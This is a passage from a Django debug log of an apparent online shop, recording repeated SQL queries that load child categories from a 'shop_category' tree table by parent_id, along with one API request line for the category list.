"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:51:47,396 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:51:47,400 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:51:47,404 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:51:47,408 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:51:47,412 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:51:47,415 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:51:47,421 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:51:47,425 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:51:47,429 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:51:47,433 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:51:47,437 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:51:47,443 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:51:47,447 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:51:47,451 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:51:47,455 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:51:47,459 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:51:47,465 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:51:47,469 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:51:47,472 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:51:47,476 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:51:47,479 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:51:47,482 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:51:47,487 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:51:47,490 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:51:47,493 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:51:47,498 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:51:47,502 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:51:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:51:47,919 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:51:47,926 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:51:47,930 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:51:47,932 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:51:47,936 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:51:47,938 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:51:47,940 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:51:47,942 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:51:47,945 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:51:47,948 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:51:47,951 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:51:47,953 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:51:47,955 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:51:47,957 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:51:47,961 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:51:47,963 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:51:47,965 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:51:47,968 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:51:47,970 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:51:47,974 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:51:47,976 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:51:47,978 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:51:47,980 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:51:47,983 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:51:47,987 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:51:47,990 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:51:47,992 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:51:47,995 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:51:47,997 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:51:47,999 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:51:48,002 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:51:48,005 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:51:48,007 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:51:48,009 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:51:48,012 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:51:48,016 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:51:48,018 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:51:48,020 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:51:48,022 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:51:48,025 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY 